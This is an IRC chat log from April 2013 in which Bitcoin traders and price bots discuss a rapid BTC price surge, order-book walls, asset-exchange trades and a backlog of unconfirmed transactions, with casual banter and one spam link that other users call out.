(sell [at|@] []) -- Logs a sell order for units of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include (1 more message) Apr 09 19:57:30 heh Apr 09 19:57:39 jurov, not sure if you're aware already but I have some sell orders that seem to be hung up Apr 09 19:57:56 ;;market --sell 50000 Apr 09 19:57:56 A market order to sell 50000 bitcoins right now would net 9392456.7823 USD and would take the last price down to 135.0000 USD, resulting in an average price of 187.8491 USD/BTC. | Data vintage: 60.1194 seconds Apr 09 19:57:57 mircea_popescu: you have to add the amount and price ;) Apr 09 19:58:03 then we'll watch it fall Apr 09 19:58:05 [HAVELOCK] [KCIM] 3 @ 1.041 = 3.123 BTC [-] Apr 09 19:58:11 ThickAsThieves: yes moment found some issue and debugging it Apr 09 19:58:16 sweet Apr 09 19:58:20 i dont recall what the command is, but it tells you where priceends up Apr 09 19:58:29 [BTCTC] [BITVPS] 15 @ 0.00021 = 0.0032 BTC [-] Apr 09 19:58:31 i'll bet you a 50k btc straight sell takes it under 100 atm Apr 09 19:58:42 its right up there mp ^ Apr 09 19:58:46 ;;market --sell 50000 Apr 09 19:58:46 A market order to sell 50000 bitcoins right now would net 9392456.7823 USD and would take the last price down to 135.0000 USD, resulting in an average price of 187.8491 USD/BTC. | Data vintage: 110.0784 seconds Apr 09 19:58:51 when has there been a 50k sell? Apr 09 19:59:37 if someone dropped 50k coins, buyers would be ecstatic Apr 09 19:59:43 last crash from 33 USD to peanuts? Apr 09 19:59:49 was a hack but anyway Apr 09 20:00:37 ah ok Apr 09 20:00:47 im not sure if ecstatic or paniced. Apr 09 20:00:54 Then it'll really crash when Gox can't pay out. ;) Apr 09 20:01:05 :p Apr 09 20:01:10 "o, just some checking" Apr 09 20:01:18 "our dwolla ran away with the tradehill" Apr 09 20:01:25 "we must wake up the developers" Apr 09 20:03:21 [MPEX] [S.MPOE] 100 @ 0.0007035 = 0.0704 BTC [-] Apr 09 20:04:18 [BTCTC] [B.YABMC] 1 @ 0.011 BTC [+] Apr 09 20:05:11 ok the options i have for sale should be showing now Apr 09 20:05:21 dont know if anyone is interested but speculating on the utility of bitcoin pre-2013 and putting SR at the top of the list... basing utility worth on yearly revenue would put btc at $1.6 per coin. It held actually around this value this until speculation started to flow in. bubble, craash... settled back to around $3 for the year and up to $13 before end of 2012. Putting price of bitcoin as a function of utility + speculation where speculation is one of Apr 09 20:05:26 86-122 Apr 09 20:05:30 bullshit im sure but didnt know if anyone would be itnerested Apr 09 20:06:00 mircea_popescu: would you mind highlighting me when you flush deposits? Thanks Apr 09 20:08:58 pizzaman1337 i see a ton of unconfirmed stuff Apr 09 20:09:03 pray to the miner gods Apr 09 20:09:26 oh miner gods, where for art thou Apr 09 20:09:33 gesell assuymption is broken Apr 09 20:09:40 sr wasn't at the tiop of the list since 2011 Apr 09 20:10:04 [MPEX] [S.MPOE] 6200 @ 0.0007035 = 4.3617 BTC [-] Apr 09 20:10:06 [HAVELOCK] [HIM] 5 @ 1.45 = 7.25 BTC [-] Apr 09 20:10:07 [HAVELOCK] [HIM] 15 @ 1.41 = 21.15 BTC [-] Apr 09 20:10:47 sorting order for orderbook on clarkmoody is messed up. (sorts in descending order: 212.0 212.9 212.8 ... 212.1 211.0) Apr 09 20:11:04 ;;ticker Apr 09 20:11:06 Error: Failure to retrieve ticker. Try again later. Apr 09 20:13:05 [HAVELOCK] [VTX] 1 @ 0.21 BTC [+] Apr 09 20:13:37 [MPEX] [O.USD.C308T] 100 @ 0.05923571 = 5.9236 BTC Apr 09 20:14:05 [HAVELOCK] [HIM] 14 @ 1.41 = 19.74 BTC [-] Apr 09 20:14:54 Havelock almost back to IPO price Apr 09 20:17:01 all these things will keep going down... Apr 09 20:18:00 wait Apr 09 20:18:03 !ticker h him Apr 09 20:18:06 [HAVELOCK:HIM] 1D: 1.41000000 / 1.55749155 / 1.89000000 (71 shares, 110.58190010 BTC), 7D: 1.41000000 / 1.75401928 / 2.04400000 (166 shares, 291.16720010 BTC), 30D: 1.41000000 / 1.8343251 / 2.08000000 (733 shares, 1344.56029840 BTC) Apr 09 20:18:13 eh Apr 09 20:22:26 OH SHIT Apr 09 20:22:42 I guesss the wall got impatient Apr 09 20:22:57 holy shit Apr 09 20:22:58 235 Apr 09 20:23:14 237 Apr 09 20:23:21 239 Apr 09 20:23:24 its gotta be that wall Apr 09 20:23:31 of $2MM Apr 09 20:23:34 well Apr 09 20:23:35 maybe not Apr 09 20:23:38 we will see soon! Apr 09 20:23:55 223 Apr 09 20:24:16 looks like the wall bought half Apr 09 20:24:21 ;;ticker Apr 09 20:24:22 BTCUSD ticker | Best bid: 223.76020, Best ask: 231.99870, Bid-ask spread: 8.23850, Last trade: 223.76020, 24 hour volume: 101197.60668312, 24 hour low: 178.00100, 24 hour high: 227.86018, 24 hour vwap: 198.89449 Apr 09 20:24:54 wat Apr 09 20:24:58 ;;ticker --last Apr 09 20:25:00 239.11100 Apr 09 20:25:01 239 Apr 09 20:25:14 its all over the place now Apr 09 20:25:31 sockets are crashing Apr 09 20:25:41 yep. Confirmed Apr 09 20:25:51 Wall at 212 cut in half Apr 09 20:26:28 ;;asks 340 Apr 09 20:26:31 There are currently 9616.2331 bitcoins offered at or under 340.0 USD, worth 2618836.03002 USD in total. | Data vintage: 0.0011 seconds Apr 09 20:26:57 mircea_popescu: Remember "20 is a bifurcation point..." ? Apr 09 20:27:32 wpw Apr 09 20:27:44 20 thousands!!1 Apr 09 20:29:01 168MM market cap for S.MPOE Apr 09 20:29:08 ;;ticker --last Apr 09 20:29:09 229.77000 Apr 09 20:30:04 [HAVELOCK] [HIM] 5 @ 1.42 = 7.1 BTC [+] Apr 09 20:39:14 ;;tslb Apr 09 20:39:18 Time since last block: 1 hour and 5 seconds Apr 09 20:39:22 what? Apr 09 20:40:04 [HAVELOCK] [VTX] 5 @ 0.248899 = 1.2445 BTC [+] Apr 09 20:40:06 [HAVELOCK] [VTX] 162 @ 0.2489 = 40.3218 BTC [+] Apr 09 20:41:04 [HAVELOCK] [SDICE] 2 @ 0.2221 = 0.4442 BTC [+] Apr 09 20:42:04 [HAVELOCK] [SDICE] 3 @ 0.22000006 = 0.66 BTC [-] Apr 09 20:43:08 ;;tslb Apr 09 20:43:13 Time since last block: 2 minutes and 11 seconds Apr 09 20:43:40 !ticker m s.dice Apr 09 20:43:41 [MPEX:S.DICE] 1D: 0.0027 / 0.00276292 / 0.00333327 (51603 shares, 142.58 BTC), 7D: 0.0027 / 0.00309136 / 0.00400173 (503326 shares, 1,555.97 BTC), 30D: 0.0027 / 0.00358308 / 0.006 (1666530 shares, 5,971.32 BTC) Apr 09 20:44:05 [HAVELOCK] [SDICE] 32 @ 0.22 = 7.04 BTC [-] Apr 09 20:45:32 [MPEX] [S.DICE] 200 @ 0.00270001 = 0.54 BTC [+] Apr 09 20:47:04 [HAVELOCK] [VTX] 1 @ 0.234 BTC [-] Apr 09 20:48:58 yay new ath Apr 09 20:49:20 quick question, and this may seem stupid Apr 09 20:49:51 with socket.io, a client web page would request the socket.io client library from the server... Apr 09 20:50:38 to clarify, the client's browser would request that library and then load it...but if you are not in control of the server, how do you know where to get the client library from? Apr 09 20:54:04 [HAVELOCK] [HIM] 6 @ 1.41 = 8.46 BTC [-] Apr 09 20:55:05 [HAVELOCK] [VTX] 2 @ 0.269 = 0.538 BTC [+] Apr 09 20:55:21 [BTCTC] [S.BBET-PT] 1 @ 0.00153 BTC [+] Apr 09 20:55:22 [MPEX] [S.MPOE] 19821 @ 0.00070415 = 13.957 BTC [+] Apr 09 20:55:25 [MPEX] [S.MPOE] 7822 @ 0.00071 = 5.5536 BTC [+] Apr 09 20:55:28 [BTCTC] [S.BBET-PT] 1 @ 0.00153 BTC [+] Apr 09 20:55:30 [BTCTC] [GSDPT] 10 @ 0.00279 = 0.0279 BTC [+] Apr 09 20:55:48 [BTCTC] [S.BBET-PT] 80 @ 0.00152 = 0.1216 BTC [-] Apr 09 20:56:50 [BTCTC] [GSDPT] 1 @ 0.002781 BTC [-] Apr 09 20:56:53 [BTCTC] [GSDPT] 1 @ 0.002781 BTC [-] Apr 09 20:56:55 [BTCTC] [GSDPT] 70 @ 0.0027 = 0.189 BTC [-] Apr 09 20:56:59 [BTCTC] [GSDPT] 59 @ 0.00261 = 0.154 BTC [-] Apr 09 20:57:01 [BTCTC] [GSDPT] 129 @ 0.0026 = 0.3354 BTC [-] Apr 09 21:01:05 [HAVELOCK] [SDICE] 2 @ 0.22 = 0.44 BTC [-] Apr 09 21:01:26 ;;tslb Apr 09 21:01:30 Time since last block: 8 minutes and 10 seconds Apr 09 21:02:01 should i let my 188s expire or sell? Apr 09 21:02:20 always the question. Apr 09 21:02:21 i think 188 isn't happening again anytime soon Apr 09 21:02:23 Keep them a bit Apr 09 21:02:29 but what do i know Apr 09 21:02:35 [MPEX] [O.USD.C302T] 100 @ 0.06611514 = 6.6115 BTC [+] Apr 09 21:02:37 MJR_: a common use case is socket.io goes on your server and in your own client web page Apr 09 21:02:44 Your code at both ends. Apr 09 21:02:48 i wouldn't have payed 188 yesterday if i thought we'd see it again Apr 09 21:02:50 Ive got a few too :) Apr 09 21:03:12 wth is going on Apr 09 21:03:22 mircea_popescu i payed 188 yesterday and almost got sick about it Apr 09 21:03:27 not feeling so bad today though Apr 09 21:03:54 i'll be priced out soon if i don't keep up Apr 09 21:03:59 [BTCTC] [S.DICE-PT] 1 @ 0.00322 BTC [-] Apr 09 21:04:03 heh Apr 09 21:04:35 little guys can't even play with the big kids in the pool Apr 09 21:04:58 sell pressure building Apr 09 21:05:08 I think we have reached the top for the day. Apr 09 21:05:11 can someone tell me what that huge order was in the past 30 min???? Apr 09 21:05:14 see at 250 tomorrow Apr 09 21:05:15 how much was it for? Apr 09 21:05:21 It for $1M Apr 09 21:05:22 5000+ Apr 09 21:05:27 half of the bidwall at 212 Apr 09 21:05:35 bingo Apr 09 21:05:38 that is what i wanted to know Apr 09 21:06:03 5159.98 x 230 per Apr 09 21:06:12 Bugpowder: did you see it get moved? how close to the edge of the wall was it moved before being eaten up, Or did he just move it directly to the other wal? Apr 09 21:07:09 ;;ticker Apr 09 21:07:11 BTCUSD ticker | Best bid: 237.62376, Best ask: 237.95000, Bid-ask spread: 0.32624, Last trade: 237.62376, 24 hour volume: 106406.95928128, 24 hour low: 180.00000, 24 hour high: 239.11100, 24 hour vwap: 202.27481 Apr 09 21:07:42 MJR_: your server code could talk via APIs to anything it wants. In theory the client could too. Mix and match communication with different end points as your app requires. Apr 09 21:08:23 btw, anyone know of an api for bitcoin.de. have people that use my tools asking for support for this exchange but cant find any api documentation (though bitcoincharts must get it somehow) Apr 09 21:08:25 I'm not an export though. Apr 09 21:10:05 still no confirms on mpex deposits? Apr 09 21:11:23 Bugpowder | I think we have reached the top for the day. << 5 mins later, new top. Sillyness. Apr 09 21:11:42 is why he quit. Apr 09 21:12:21 even for the most bullish among us - gotta admit that this seems a bit scary.... Apr 09 21:12:54 I agree. Apr 09 21:12:58 ya Apr 09 21:13:34 no way, this is thrilling, my moneys out + x2 profit. Apr 09 21:14:12 let it crash, i'll buy in again with profits Apr 09 21:14:20 i'm expecting big ask walls to come out of the wood works any minute now Apr 09 21:14:38 like back in $93 Apr 09 21:14:44 you know... obviously it would have been better if this happened slowly, over the course of a year. Apr 09 21:14:48 but what ever is reasonable ? Apr 09 21:15:02 come to think about it, the evolution of BTC mimicks the evolution of s.mpoe. Apr 09 21:15:06 [MPEX] [S.MPOE] 1100 @ 0.00071 = 0.781 BTC [+] Apr 09 21:15:08 no precedent for something like this, i suppose... Apr 09 21:15:17 itstarted at 0.00002, went to 0.004 within a fewe mionths Apr 09 21:15:18 400*240 Apr 09 21:15:22 and it's been sorta there since then Apr 09 21:15:45 mircea, care-i treaba :p Apr 09 21:15:51 maybe btc does a similar number. runs up to 1k or w/e, then spends a year there. Apr 09 21:15:57 zinodaur bine. Apr 09 21:16:26 ;;ticker Apr 09 21:16:27 BTCUSD ticker | Best bid: 239.00001, Best ask: 239.98000, Bid-ask spread: 0.97999, Last trade: 239.98000, 24 hour volume: 106856.63799052, 24 hour low: 180.00000, 24 hour high: 239.11100, 24 hour vwap: 202.50570 Apr 09 21:16:27 de prin ce parte a tarii o arzi ? :) Apr 09 21:16:31 that was an ath. Apr 09 21:16:34 zinodaur timisoara. Apr 09 21:16:40 ah. Apr 09 21:16:45 240 Apr 09 21:16:57 ye Apr 09 21:17:02 price seems to know only one way Apr 09 21:17:08 159.62 2 minutes ago 240.00 Apr 09 21:17:15 its good to be the king. Apr 09 21:17:18 im like... o wait, that's like... a house ? cool. Apr 09 21:17:22 ;;goxlag Apr 09 21:17:22 MtGox lag is 264.997942 seconds. During this time, light travels 0.531052908703 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 09 21:17:28 [MPEX] [S.MPOE] 18800 @ 0.00071 = 13.348 BTC [+] Apr 09 21:17:36 [MPEX] [O.USD.P308T] 1 @ 0.89573103 BTC Apr 09 21:17:46 i dont hold any btc right now Apr 09 21:17:54 not nervous yet Apr 09 21:18:28 christ Apr 09 21:18:33 oh 5 min lag here we go, if i had btc i'd start to get nervous now Apr 09 21:18:35 it'd be a dream to stabilise at 250 :p Apr 09 21:18:36 :s Apr 09 21:18:36 [BTCTC] [S.MPOE-PT] 2 @ 0.00069 = 0.0014 BTC [+] Apr 09 21:18:58 zinodaur sell at 250 and it will be stable there Apr 09 21:19:12 lol Apr 09 21:19:33 ;;ticker Apr 09 21:19:35 BTCUSD ticker | Best bid: 239.00001, Best ask: 240.00000, Bid-ask spread: 0.99999, Last trade: 240.00000, 24 hour volume: 106856.63799052, 24 hour low: 180.00000, 24 hour high: 239.11100, 24 hour vwap: 202.50570 Apr 09 21:20:05 ;;ticker Apr 09 21:20:12 BTCUSD ticker | Best bid: 238.10000, Best ask: 239.00000, Bid-ask spread: 0.90000, Last trade: 238.10000, 24 hour volume: 106856.63799052, 24 hour low: 180.00000, 24 hour high: 239.11100, 24 hour vwap: 202.50570 Apr 09 21:20:12 there's like 5 txs to mpex have been waiting to be confirmed for > 2 hours by now Apr 09 21:20:23 i guess people are learning the value of keeping your btc on mpex ? Apr 09 21:20:29 lol 240 Apr 09 21:20:32 Virtex at $289 CAD... Apr 09 21:20:35 [MPEX] [O.USD.C248T] 10 @ 0.13299188 = 1.3299 BTC [+] Apr 09 21:21:19 bleeeed Apr 09 21:25:28 ;;goxlag Apr 09 21:25:29 MtGox lag is 262.702221 seconds. During this time, light travels 0.526452309523 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 09 21:26:44 s.dice...... :( Apr 09 21:28:20 [BTCTC] [S.MPOE-PT] 10 @ 0.000685 = 0.0069 BTC [-] Apr 09 21:29:04 [HAVELOCK] [KCIM] 1 @ 1.04000001 BTC [-] Apr 09 21:32:07 $avg Apr 09 21:32:14 deadweasel: 203.29 Apr 09 21:32:32 yay :) Apr 09 21:33:55 ;;bc,stats Apr 09 21:33:59 Current Blocks: 230495 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1344 blocks | Next Difficulty In About: 1 week, 1 day, 1 hour, 8 minutes, and 58 seconds | Next Difficulty Estimate: 8910584.56432 | Estimated Percent Change: 16.12908 Apr 09 21:34:58 Listen, I don't want to alarm anyone, but I think we may be heading towards bubble territory soon. Just sayin'. Apr 09 21:35:06 ;;goxlag Apr 09 21:35:07 MtGox lag is 248.891458 seconds. During this time, light travels 0.498775695104 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 09 21:35:34 unbalanced_: i am not alarmed. Apr 09 21:36:11 OMG I am alarmed! Apr 09 21:36:20 this is expected. in that i expected antything at any moment. Apr 09 21:36:28 still do Apr 09 21:37:05 [HAVELOCK] [VTX] 1 @ 0.269 BTC [+] Apr 09 21:37:10 will retrace tonight, or not, then up around 4am EST Apr 09 21:37:25 Maybe the BTC price will surpass my Bubbled mortgage Apr 09 21:37:29 unbalanced_ ity's not even 3x the previous enfoced plateau Apr 09 21:37:38 and I can pay it off with bubbled BTC Apr 09 21:37:50 i hope so! Apr 09 21:38:03 Me too. Apr 09 21:38:41 gonna be a long night... Apr 09 21:38:52 everbody calls ia bubble now pretty much Apr 09 21:39:03 how long can this go on, with peple being anxious to big moves in either side Apr 09 21:39:39 everyone in these channels (which have been around for a long time) call it a bubble. Some have been for a long time Apr 09 21:39:49 $avg Apr 09 21:39:50 ThickAsThieves: 203.69 Apr 09 21:39:51 since 30 Apr 09 21:39:55 While on places like MtGox, LocalBitcoins, etc Apr 09 21:40:01 Dudes, I was being facetious. https://www.google.ca/search?q=facetious Apr 09 21:40:03 tons of newbies flocks by the ton to buy... Apr 09 21:40:30 This is like high school all over again. Nobody understands me... :) Apr 09 21:41:52 I think we see 1000 before this ends at this rate. Apr 09 21:41:52 nah, not everyone calls it so Apr 09 21:42:21 I was wondering if we'd reach 100, I said, we just have to reach 100 before it pops... Apr 09 21:42:27 And if BTC reakky gets adopted completely well beyond 1000. Apr 09 21:42:30 now we're like way over... Apr 09 21:42:31 According to Dr. Rodrigue, the "media attention" phase we're in now is just The Beginning of the run-up: http://i.imgur.com/iMjfGf7.jpg Apr 09 21:42:32 really* Apr 09 21:42:37 If it reach 1000 I'll go nuts Apr 09 21:43:54 but compared to the mean, we should be way lower and are almost moving vertically over it Apr 09 21:44:05 We're like at greed/delusion Apr 09 21:44:49 Well, 3 months ago if you said BTC will be at 240 id would have called you nutts. Apr 09 21:44:50 it's just starting to verticalize(TM) on log charts. Apr 09 21:44:59 benkay? Apr 09 21:45:03 Happened so fast. Apr 09 21:46:02 Look the 365 exponential moving average Apr 09 21:46:08 365 days Apr 09 21:46:09 http://bitcoincharts.com/charts/mtgoxUSD#tgSza1gEMAzm1g365zm2g21 Apr 09 21:46:19 it's slowly moving up... Apr 09 21:46:36 but the current price is just bending the line crazily Apr 09 21:46:49 and is way, way over Apr 09 21:47:13 It's not like bitcoin businesses can grow and develop overnight Apr 09 21:47:26 That price rise is speculative from flocking "investors" Apr 09 21:47:28 specul;ators can tho Apr 09 21:47:34 not true adoption Apr 09 21:47:55 Namworld how do you know it's not investors catching up with adoption ? Apr 09 21:48:02 don't, i will hold minus 5% profit leak at intervals Apr 09 21:48:36 the rest of the process be damned. Apr 09 21:48:44 Seems odd... Apr 09 21:48:55 It's usually the other way around... Apr 09 21:49:00 mircea_popescu, interesting point but I agree with namworld Apr 09 21:49:01 if it ain't broke... Apr 09 21:49:13 maybe but... I don't think that's the case Apr 09 21:49:31 what I see is the buying wall shrinking Apr 09 21:49:33 I don't see the adoption yet Apr 09 21:49:43 i see a lot of sites accepting donations with bitcoins tho Apr 09 21:49:47 you adopted it Apr 09 21:49:48 taub, there actually has been a lot of adoption Apr 09 21:49:49 so that's some sign Apr 09 21:50:11 e-gov is letting citizens in e-gov areas pay for things with bitcoin now Apr 09 21:50:20 I think that's probably the biggest adoption this week Apr 09 21:50:27 when you can buy tf2 hats on steam with bitcoins we're going to am illion per coin lol Apr 09 21:50:37 lol Apr 09 21:50:43 InstantBTC i see both arguments Apr 09 21:50:49 the problem is partitioning reality among them Apr 09 21:51:12 [BTCTC] [BASIC-MINING] 2 @ 0.395 = 0.79 BTC [-] Apr 09 21:51:14 I don't think tf2 hats have a strong enough influence on... any economy to make anything worth 1 million lol Apr 09 21:51:20 he was being funny. Apr 09 21:52:08 ah. now I see what the other guy in #bitcoin-otc meant by get sarcasm detector working before coming here lol Apr 09 21:53:09 [BTCTC] [ASICMINER-PT] 2 @ 0.779 = 1.558 BTC [+] Apr 09 21:53:09 only half kidding, ofc not 1m, but something like steam adopting would be huge huge nwes Apr 09 21:53:51 taub we can settle on half of 10% :p Apr 09 21:53:57 [MPEX] [S.MPOE] 12550 @ 0.00071 = 8.9105 BTC [+] Apr 09 21:54:13 :) Apr 09 21:55:59 [BTCTC] [PAJKA.BOND] 1 @ 0.09868 BTC [+] Apr 09 21:57:19 In other coin bubble news... Canadian Mint came out with next its series of coins with glass figurines stuck to them: Apr 09 21:57:20 http://www.mint.ca/store/coin/fine-silver-coin-purple-coneflower-with-venetian-glass-butterfly-mintage-10000-2013-prod1670015 Apr 09 21:57:32 Sold out 10,000 at $150 quite quickly. Apr 09 21:58:14 A large Canadian reseller store that bought many of them is now sold out at $250 each: http://www.cdncoin.com/product-p/623932043589.htm Apr 09 21:58:48 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 09 21:58:51 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 09 21:59:13 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 09 21:59:24 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [-] Apr 09 22:00:03 [BTCTC] [ASICMINER-PT] 4 @ 0.741 = 2.964 BTC [-] Apr 09 22:00:16 All for 1 oz of silver. Apr 09 22:02:04 ;;ticker Apr 09 22:02:06 BTCUSD ticker | Best bid: 230.00000, Best ask: 231.00000, Bid-ask spread: 1.00000, Last trade: 230.00000, 24 hour volume: 107341.81087907, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 203.79970 Apr 09 22:02:09 bears Apr 09 22:02:35 https://bitcointalk.org/index.php?topic=171388.0 Apr 09 22:02:40 how can hazek be this retarded ? Apr 09 22:02:44 heh, #bitcoin is shuffling people over to "#bitcoin-pricetalk" Apr 09 22:02:47 mpex leverage for last month was like 400k btc. Apr 09 22:02:47 real talk, yo. Apr 09 22:02:55 his puny 500k usd are "to da moon" ? Apr 09 22:03:02 where do they find these tards. srsly. Apr 09 22:06:13 don't be jealous of the 'bitcoin opportunity fund' :P Apr 09 22:08:34 i'm just a little sick of this super-superficial attitude Apr 09 22:08:40 "i see x dork on tv, must mean he's rich" Apr 09 22:08:50 yea, that's how it works. totally. Apr 09 22:09:07 no doubt Apr 09 22:09:20 killed my tv 8 years ago Apr 09 22:09:30 "mpex is too expensive ergo it doesn't exist. the rich people there do billionty dollars, but it never happened because they don't take my fiddy bux" Apr 09 22:10:04 mircea_popescu: have been thinking, in the 'unlikely' event bitcoin fails in a not too distant future and a good alternative arises (if), what happens to mpex? would you consider moving over and transfering current stock holders? Apr 09 22:10:11 before the recent betsofbitcoin scam bitbet was doing 1.5-2k btc a month, betsofbitcoin was doing 20-50 Apr 09 22:10:24 "o, betsofbitcoiin, the tralalala" Apr 09 22:10:43 FabianB yes, in the very catastrophic event you have in mind. Apr 09 22:10:58 just a thought experiment Apr 09 22:11:11 if it's this very clear cut, bitcoin is ded, bitcoin' is here Apr 09 22:11:14 then yes. Apr 09 22:11:46 yeah, of course not if all that happend is price plummeting to 1 usd Apr 09 22:12:07 more like if there's a security problem not fixable and price going to 0 Apr 09 22:12:14 depending on context i think simply another alt chain being worth more would mean i move. Apr 09 22:12:16 depending. Apr 09 22:12:48 this is all highly speculative of course and actual situations may play whichever way circumstances dictate etc. Apr 09 22:12:52 that means holding s.mpoe can hedge against btc failure Apr 09 22:13:01 of course Apr 09 22:13:08 holding s.mpoe hedges against everything other than me going mad. Apr 09 22:13:45 seems like :) Apr 09 22:17:35 wow cant believe these deposits havent cleared yet... Apr 09 22:17:55 yeah, it's been a while... Apr 09 22:18:25 .0002 tx fee Apr 09 22:20:04 [MPEX] [O.USD.C215T] 2 @ 0.20526835 = 0.4105 BTC [+] Apr 09 22:22:05 [HAVELOCK] [HIM] 1 @ 1.41 BTC [-] Apr 09 22:33:46 @Mircea_Popescu You should consider introducing #mircoin Apr 09 22:34:05 that's possibly the most ridiculous sounding thing ever. mircoin Apr 09 22:34:17 sounds too much like micon Apr 09 22:34:25 popescucoin? Apr 09 22:34:38 cucoin! Apr 09 22:34:59 I'll mine. Apr 09 22:35:19 cockoin Apr 09 22:35:56 I wonder what "work" would consist of with cockoin... Apr 09 22:36:01 mtgox should just die Apr 09 22:36:33 pgp i dunno but everyone mining it has real long penises... Apr 09 22:37:53 max johnson Apr 09 22:39:28 [BTCTC] [ASICMINER-PT] 1 @ 0.7798 BTC [+] Apr 09 22:39:38 ;;ticker Apr 09 22:39:40 BTCUSD ticker | Best bid: 235.80001, Best ask: 237.00000, Bid-ask spread: 1.19999, Last trade: 235.80001, 24 hour volume: 107994.08151368, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 205.87526 Apr 09 22:39:45 eh wtf is this. Apr 09 22:40:05 scam! Apr 09 22:40:25 [MPEX] [S.MPOE] 395 @ 0.00071 = 0.2805 BTC [+] Apr 09 22:40:27 [MPEX] [S.MPOE] 13050 @ 0.00071052 = 9.2723 BTC [+] Apr 09 22:40:39 !t m s.dice Apr 09 22:40:41 [MPEX:S.DICE] 1D: 0.0027 / 0.00276268 / 0.00333327 (51803 shares, 143.12 BTC), 7D: 0.0027 / 0.00309121 / 0.00400173 (503526 shares, 1,556.51 BTC), 30D: 0.0027 / 0.00357535 / 0.00599987 (1661472 shares, 5,940.36 BTC) Apr 09 22:40:41 [MPEX] [S.MPOE] 8355 @ 0.00071199 = 5.9487 BTC [+] Apr 09 22:42:45 so what's the longest folks have seen a single transaction take without getting a single confirm? Apr 09 22:45:40 hours Apr 09 22:46:08 i had 12 hours myself, I am sure there are longer Apr 09 22:47:13 ;;ticker Apr 09 22:47:15 BTCUSD ticker | Best bid: 236.00102, Best ask: 236.98900, Bid-ask spread: 0.98798, Last trade: 236.00102, 24 hour volume: 107837.97713614, 24 hour low: 180.00000, 24 hour high: 240.11100, 24 hour vwap: 206.40299 Apr 09 22:47:20 bgupta 19 hours Apr 09 22:47:41 geez Apr 09 22:47:42 not enough nodes. what is the node count anyhow? Apr 09 22:48:08 well doesn't difficulty adjust to the numer of nodes? Apr 09 22:48:50 ask a real miner. i'm a minor miner Apr 09 22:49:13 The network currently has over 2300 pending transactions.. typically only 1000 pending transactions. Apr 09 22:49:19 no, nodes just relay Apr 09 22:49:45 1000 nodes, plus or minus Apr 09 22:52:21 apparently there is a huge and growing backlog in transactions http://blockchain.info/new-transactions Apr 09 22:53:05 [HAVELOCK] [HIM] 1 @ 1.2 BTC [-] Apr 09 22:53:38 this morning it was at 700, right now 2200 - 4-5 blocks real quick would wipe out the backlog - depending on the size Apr 09 22:54:05 [HAVELOCK] [HIM] 7 @ 1.2 = 8.4 BTC [-] Apr 09 22:54:59 failing to make a new high Apr 09 22:55:06 oh bwoy Apr 09 22:55:52 bitbet needs a better rating system though Apr 09 22:55:55 like Apr 09 22:55:58 is it just me or is this game riggable? http://www.satoshi-karoshi.com/?r=10670 ive just been going left to right and making baaank Apr 09 22:56:05 [HAVELOCK] [VTX] 2 @ 0.28 = 0.56 BTC [+] Apr 09 22:56:10 is it just me or are you a spammer Apr 09 22:56:21 who Apr 09 22:56:22 ha! Apr 09 22:56:27 [MPEX] [O.USD.C230T] 100 @ 0.17381693 = 17.3817 BTC Apr 09 22:56:36 kakobrekla: damnkaroshi spammers are back Apr 09 22:56:58 hm Apr 09 22:57:19 well not much to do since he posts and parts Apr 09 22:57:30 options b is he posts and gets banned and parts Apr 09 22:57:36 so .. not much of a win Apr 09 22:57:38 hmm maybe its only riggable if i use his refferal code Apr 09 22:57:43 that site has viruo ya, i missed that. thx anyhow1 Apr 09 22:58:01 gah :\ Apr 09 22:58:10 well im open to ideas here Apr 09 22:58:13 that site has a virus last time i checked. Apr 09 22:58:40 no worries. kakobrekla, i thought he was going to sell it. i missed him 'partin' Apr 09 22:58:42 i dont click links in this channel anyway, too much porn Apr 09 22:58:51 ^ Apr 09 22:58:54 yup Apr 09 22:59:08 although when i'm not at work i clickem all Apr 09 22:59:28 [MPEX] [O.USD.C260T] 120 @ 0.1206268 = 14.4752 BTC Apr 09 22:59:34 meh work Apr 09 23:00:07 is this teh new high Apr 09 23:01:26 clockin' out, later! Apr 09 23:01:32 deposits flushed Apr 09 23:02:04 If I remember correctly kakobrekla was living off BTC income a very long time ago. Apr 09 23:02:26 ya but meanwhile that went bust Apr 09 23:02:32 now he's living off plucking pigeons Apr 09 23:02:40 :D Apr 09 23:03:47 !ticker h vtx Apr 09 23:03:49 [HAVELOCK:VTX] 1D: 0.20000000 / 0.2247293 / 0.29999990 (522 shares, 117.30869271 BTC), 7D: 0.20000000 / 0.34787883 / 0.56000000 (1465 shares, 509.64248047 BTC), 30D: 0.20000000 / 0.42544027 / 0.79900000 (14112 shares, 6003.81302600 BTC) Apr 09 23:04:00 !ticker h him Apr 09 23:04:01 [HAVELOCK:HIM] 1D: 1.20000000 / 1.50716374 / 1.89000000 (91 shares, 137.15190010 BTC), 7D: 1.20000000 / 1.70644973 / 2.00000000 (185 shares, 315.69320010 BTC), 30D: 1.20000000 / 1.82089017 / 2.08000000 (753 shares, 1371.13029840 BTC) Apr 09 23:04:03 Doffx like 2 years now Apr 09 23:04:04 [MPEX] [S.DICE] 800 @ 0.00270001 = 2.16 BTC [+] Apr 09 23:04:07 [MPEX] [S.DICE] 74200 @ 0.0027 = 200.34 BTC [-] Apr 09 23:04:12 https://bitcointalk.org/index.php?topic=105818.msg1785348#msg1785348 Apr 09 23:04:13 lol Apr 09 23:04:18 I need to put more effort in to it. Apr 09 23:04:27 well Apr 09 23:04:35 its been hard to go bankrupt latley Apr 09 23:04:42 I am making insane extra side cash, but no way I could live off it. Apr 09 23:05:20 The whole pirate, glbse nonsense made me shy away for a while too. Apr 09 23:05:20 i made ~200mn past year. Apr 09 23:05:29 btc? Apr 09 23:05:34 hehe Apr 09 23:05:35 no, dollah Apr 09 23:05:46 Nice. Apr 09 23:05:48 if these numbers are to be believed Apr 09 23:06:06 well i made shit compared to that. Apr 09 23:06:21 !ticker these beenz are shit Apr 09 